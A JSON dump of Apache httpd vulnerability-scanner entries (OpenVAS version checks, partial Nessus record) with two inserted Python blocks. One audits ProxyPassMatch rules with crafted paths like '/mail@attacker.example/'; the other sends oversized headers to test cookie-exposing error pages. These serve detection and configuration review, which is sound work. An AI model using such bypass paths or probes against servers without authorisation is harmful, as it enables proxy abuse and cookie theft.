"2012-02-13T00:00:00", "id": "OPENVAS:136141256231070724", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070724", "title": "Debian Security Advisory DSA 2405-1 (apache2)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2405_1.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from advisory DSA 2405-1 (apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\nAn integer overflow in ap_pregsub() could allow local attackers to\nexecute arbitrary code at elevated privileges via crafted .htaccess\nfiles.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\nThe Apache HTTP Server did not properly validate the request URI for\nproxied requests. In certain reverse proxy configurations using the\nProxyPassMatch directive or using the RewriteRule directive with the\n[P] flag, a remote attacker could make the proxy connect to an\narbitrary server. 
This could allow the attacker to access internal\nservers that are not otherwise accessible from the outside.\n\nThe three CVE ids denote slightly different variants of the same\nissue.\n\nNote that, even with this issue fixed, it is the responsibility of\nthe administrator to ensure that the regular expression replacement\npattern for the target URI does not allow a client to append arbitrary\nstrings to the host or port parts of the target URI. For example, the\nconfiguration\n\nProxyPassMatch ^/mail(.*) http://internal-host$1\n\nis still insecure and should be replaced by one of the following\nconfigurations:\n\nProxyPassMatch ^/mail(/.*) http://internal-host$1\nProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\nAn apache2 child process could cause the parent process to crash\nduring shutdown. This is a violation of the privilege separation\nbetween the apache2 processes and could potentially be used to worsen\nthe impact of other vulnerabilities.\n\nCVE-2012-0053:\n\nThe response message for error code 400 (bad request) could be used to\nexpose httpOnly cookies. 
This could allow a remote attacker using\ncross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202405-1\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70724\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 11:19:29 -0500 (Mon, 13 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2405-1 (apache2)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", 
ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n 
report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:02:01", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2018-04-06T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881089", "href": 
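Added example (not part of DSA 2405-1 or of any scanner plugin on this page): the Debian advisory above warns that even with the CVE-2011-3368/3639/4317 fixes applied, a `ProxyPassMatch` substitution such as `^/mail(.*) http://internal-host$1` still lets a client append text to the host or port of the target URI. The script below applies the three directives quoted in the advisory to a handful of constructed request paths (all beginning with `/`, so none of them is the CVE bypass itself) and reports which ones move the proxied request to a different host or port than the administrator wrote. The sample paths and the helper names are assumptions for illustration; the directive strings are the advisory's own.

```python
import re
from urllib.parse import urlsplit

# The three directives quoted in DSA 2405-1. Apache syntax: pattern, then a
# target in which $N refers to the pattern's N-th capture group.
INSECURE = (r"^/mail(.*)", "http://internal-host$1")
SAFE_SLASH_IN_GROUP = (r"^/mail(/.*)", "http://internal-host$1")
SAFE_SLASH_IN_TARGET = (r"^/mail/(.*)", "http://internal-host/$1")

# Constructed sample request paths (not from the advisory). Every one starts
# with "/", so the request-line check added for CVE-2011-3368 accepts them;
# the point is what the substitution itself lets a client do.
SAMPLE_PATHS = [
    "/mail/inbox",              # legitimate request
    "/mailbox",                 # no separator: rewrites the host name
    "/mail:8080/admin",         # appends a port
    "/mail.attacker.example/",  # appends DNS labels to the host
    "/mail@attacker.example/",  # demotes the intended host to userinfo
]


def expand(pattern, replacement, path):
    """Compute the proxied target URL for one request path, or None when the
    pattern does not match (Apache then does not proxy the request at all)."""
    m = re.match(pattern, path)
    if m is None:
        return None
    # Map Apache's $1..$9 back-references to Python's \1..\9 for Match.expand().
    return m.expand(re.sub(r"\$(\d)", r"\\\1", replacement))


def target_changed(pattern, replacement, path):
    """True when a client-chosen path sends the proxied request to a host or
    port other than the one written literally in the directive."""
    target = expand(pattern, replacement, path)
    if target is None:
        return False
    intended = urlsplit(re.sub(r"\$\d", "", replacement))
    actual = urlsplit(target)
    return (actual.hostname, actual.port) != (intended.hostname, intended.port)


def audit(directive, paths=SAMPLE_PATHS):
    """Map each sample path to True if it escapes the intended origin."""
    pattern, replacement = directive
    return {p: target_changed(pattern, replacement, p) for p in paths}


if __name__ == "__main__":
    for label, directive in (("insecure", INSECURE),
                             ("safe (slash inside group)", SAFE_SLASH_IN_GROUP),
                             ("safe (slash in target)", SAFE_SLASH_IN_TARGET)):
        print(f"ProxyPassMatch {directive[0]} {directive[1]}  [{label}]")
        for path, escaped in audit(directive).items():
            target = str(expand(*directive, path))
            print(f"  {path:26s} -> {target:42s} {'ESCAPES' if escaped else 'ok'}")
```

The insecure pattern lets four of the five paths reach a host or port the administrator never named, including `http://internal-host@attacker.example/`, which a URL parser reads as host `attacker.example`; both corrected patterns either pass the path through unchanged or, because the literal `/` after `mail` no longer matches, decline to proxy the request at all.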
"http://plugins.openvas.org/nasl.php?oid=1361412562310881089", "title": "CentOS Update for httpd CESA-2012:0128 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n \n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. 
(CVE-2012-0053)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n \n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881089\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T15:16:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:1361412562310870631", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310870631", "title": "RedHat Update for httpd RHSA-2012:0128-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870631\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. 
An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", 
rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:13:09", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
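Added example (not part of any advisory or plugin on this page): every entry above describes CVE-2012-0053 as the default 400 error page echoing the full offending header line when a header is too long or malformed. The plugins on this page detect the issue by package version only; the script below is a direct behavioural check. It builds a request whose `X-Probe` header exceeds Apache's default `LimitRequestFieldSize` of 8190 bytes (assumed default; adjust for a target that overrides it) and reports whether the 400 body reflects the canary from that header. The two sample responses are constructed for offline use, not captured from a real server, and the canary string and function names are assumptions.

```python
import socket

# Apache's default LimitRequestFieldSize (assumed; override if the target differs).
# A header line longer than this is rejected with 400, and before the fix the
# default error page included the rejected header line verbatim.
LIMIT_REQUEST_FIELD_SIZE = 8190
CANARY = "HTTPONLY-PROBE-7f3a"   # arbitrary marker, constructed for this example


def build_probe(host, canary=CANARY, limit=LIMIT_REQUEST_FIELD_SIZE):
    """Raw HTTP/1.1 request whose X-Probe header line is longer than `limit`,
    so the server must answer 400. The canary makes any echo easy to spot."""
    padding = "A" * (limit - len(canary) + 1)
    return (
        f"GET / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"X-Probe: {canary}{padding}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status_code, body_text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    code = int(status_line.split()[1])
    return code, body.decode("utf-8", "replace")


def reflects_header(raw_response, canary=CANARY):
    """True if a 400 response body echoes the content of the rejected header,
    i.e. the behaviour described for CVE-2012-0053."""
    code, body = parse_response(raw_response)
    return code == 400 and canary in body


def probe(host, port=80, timeout=5.0):
    """Send the probe over plain TCP and classify the answer (network access)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host))
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return reflects_header(b"".join(chunks))


# Constructed sample responses for offline testing (not real server output).
SAMPLE_VULNERABLE = (
    b"HTTP/1.1 400 Bad Request\r\nContent-Type: text/html\r\n\r\n"
    b"<h1>Bad Request</h1>\n<p>Size of a request header field exceeds server limit.<br />\n"
    b"<pre>\nX-Probe: HTTPONLY-PROBE-7f3aAAAAAAAA...\n</pre>\n</p>"
)
SAMPLE_FIXED = (
    b"HTTP/1.1 400 Bad Request\r\nContent-Type: text/html\r\n\r\n"
    b"<h1>Bad Request</h1>\n<p>Size of a request header field exceeds server limit.</p>"
)

if __name__ == "__main__":
    print("constructed vulnerable response reflects header:", reflects_header(SAMPLE_VULNERABLE))
    print("constructed fixed response reflects header:    ", reflects_header(SAMPLE_FIXED))
```

In a browser the header that grows past the limit would be `Cookie:`, which carries httpOnly values the page's JavaScript cannot read directly; the probe uses a custom header instead because all it needs to establish is whether the server echoes the rejected line.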
